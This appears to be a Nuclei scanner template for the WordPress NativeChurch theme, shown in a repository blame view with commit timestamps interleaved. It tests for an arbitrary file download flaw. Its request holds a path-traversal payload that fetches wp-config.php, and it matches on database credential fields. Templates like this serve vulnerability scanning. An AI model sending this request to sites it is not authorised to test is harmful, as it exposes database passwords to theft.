nuclei-templates/vulnerabilities/wordpress/nativechurch-wp-theme-lfd.yaml

27 lines
845 B
YAML
Raw Normal View History

2021-07-15 09:41:08 +00:00
id: nativechurch-wp-theme-lfd
info:
name: WordPress NativeChurch Theme - Arbitrary File Retrieval
2021-07-15 09:41:08 +00:00
author: 0x_Akoko
severity: high
description: An arbitrary file retrieval vulnerability in the download.php file in the NativeChurch Theme allows attackers to download files from the system.
reference:
- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
tags: wordpress,wp-theme,lfi
2021-07-15 09:41:08 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
2021-07-15 12:13:45 +00:00
- "DB_HOST"
- "The base configurations of the WordPress"
2021-07-15 09:41:08 +00:00
part: body
condition: and